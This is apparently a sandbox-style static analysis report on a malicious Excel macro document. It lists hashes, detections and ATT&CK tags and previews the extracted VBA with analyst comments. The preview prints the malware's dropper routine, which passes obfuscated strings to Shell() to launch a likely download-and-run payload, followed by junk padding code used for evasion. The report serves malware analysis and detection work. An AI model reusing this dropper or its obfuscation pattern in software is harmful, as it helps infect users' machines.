Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 771d606f4ea3eb11…

MALICIOUS

Office (OLE)

144.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2020-09-15
MD5: 043d75d6322b495a1b23ff18e7f28999 SHA-1: 09fdcc7011bd49107111474f36ddb4f9de5b5136 SHA-256: 771d606f4ea3eb112864b2946dcc1dcdc5bdaf0569d9f0f664b01915afe3c6d3
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The script builds the command at runtime by concatenating strings decoded from obfuscated literals and passes the result to Shell(). This functionality strongly suggests the sample is designed to download and execute a secondary payload, likely for further malicious actions.

Heuristics 3

  • ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 50942 bytes
SHA-256: 933a1e1f52528eb65127e0bb34479665f53d4279d31d22aa8e327839ef59e296
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Exported module header: the macro module is named "Module1". No Option Explicit
' line is visible in this preview, so undeclared variables default to Variant.
Sub MPPP()
' Routine flagged by the OLE_VBA_SHELL heuristic. It decodes two obfuscated
' string literals with the helper pM5Mt0LXG (its definition is not in this
' preview) and hands the concatenation to Shell(). The decoded command is not
' reproduced in this report, so the exact payload behaviour is unconfirmed.

' d0 is not declared (no Option Explicit visible) — implicitly a Variant.
d0 = pM5Mt0LXG("u{p|i(p||xBddr6uxd", "8")

' Shell() executes the assembled string; this is the detection point.
Shell (d0 + pM5Mt0LXG("vm9wmss{", "9"))

End Sub
Public Function yRxUnznlfxuQALQNZqrM()
' No callers visible in the preview and no return value is assigned.
' Assigns the string literal "2360" to a Long (implicit VBA coercion).
' Looks like filler/junk code padding the module — confirm against the full source.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"

End Function
Private Function FwKUDCqcDamAizmqPD()
' Same filler pattern as yRxUnznlfxuQALQNZqrM with a DoEvents loop added.
' Nothing is returned and no callers are visible in the preview.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
' Five iterations that only yield to the message loop — no observable effect
' beyond a small delay; possibly noise to pad the macro — TODO confirm.
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY

End Function
Public Function PQOTEyFjwvLPRJjyq()
' Filler routine: literal-to-Long assignment, a DoEvents loop, and a
' comparison of two different string literals. No return value, no visible callers.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
' The two literals are never equal, so the End statement is dead code.
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End

End Function
Private Sub qNImoUpuCsYhfkHOVzMLcg()
' Filler routine; each junk procedure in this module repeats the previous one
' and appends one more no-op statement. No visible callers.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
' Literals differ — End is never reached.
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
' Assigned and never read.
HrZcwZdrnVkJJktFiB = "1598"

End Sub
Public Function wQicueAkuAwIaowxGeZC()
' Filler routine (see qNImoUpuCsYhfkHOVzMLcg); adds a second unused Long.
' No return value, no visible callers.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
' Literals differ — End is never reached.
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
' String literal coerced to Long; value is never read.
SIojkinYfmCddsild = "4503"

End Function
Private Function HpeypgtEnmaaBJVyR()
' Filler routine (see wQicueAkuAwIaowxGeZC); adds an unused Currency variable.
' No return value, no visible callers.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
' Literals differ — End is never reached.
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"
Dim nlfxuQALQNZqrMN As Currency
' String literal coerced to Currency; value is never read.
nlfxuQALQNZqrMN = "3118"

End Function
Public Function FUBHbjZEzADohoStfvzBtSvaKuOFwKUDCqcDamAiz()
' Filler routine (see HpeypgtEnmaaBJVyR); adds a second DoEvents loop.
' No return value, no visible callers.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
' Literals differ — End is never reached.
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"
Dim nlfxuQALQNZqrMN As Currency
nlfxuQALQNZqrMN = "3118"
Dim BvNKhDciepsHdeox As Integer
' Four more message-loop yields; no observable effect.
For BvNKhDciepsHdeox = 2 To 5
   DoEvents
Next BvNKhDciepsHdeox

End Function
Private Sub YrmbGPQOTEyFjwvL()
' Filler routine (see FUBHbjZEzADohoStfvzBtSvaKuOFwKUDCqcDamAiz); adds a second
' always-false literal comparison. No visible callers.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
' Literals differ — End is never reached.
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"
Dim nlfxuQALQNZqrMN As Currency
nlfxuQALQNZqrMN = "3118"
Dim BvNKhDciepsHdeox As Integer
For BvNKhDciepsHdeox = 2 To 5
   DoEvents
Next BvNKhDciepsHdeox
' Literals differ — End is never reached.
If "yqbIKgIMblFT" = "tTqpRyPCGgGRLebxT" Then End

End Sub
Public Function kgsIYthqNImoUuCsYghfkHOVzM()
' Filler routine (see YrmbGPQOTEyFjwvL); adds a GoTo to the very next line.
' No return value, no visible callers.
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
' Literals differ — End is never reached.
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"
Dim nlfxuQALQNZqrMN As Currency
nlfxuQALQNZqrMN = "3118"
Dim BvNKhDciepsHdeox As Integer
For BvNKhDciepsHdeox = 2 To 5
   DoEvents
Next BvNKhDciepsHdeox
' Literals differ — End is never reached.
If "yqbIKgIMblFT" = "tTqpRyPCGgGRLebxT" Then End
' Jump to the immediately following label: a no-op, control flow is unchanged.
GoTo azOHrZcwZdr
azOHrZcwZdr:

End Function
Public Sub VkJJktFiBhEQ()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then E
... (truncated)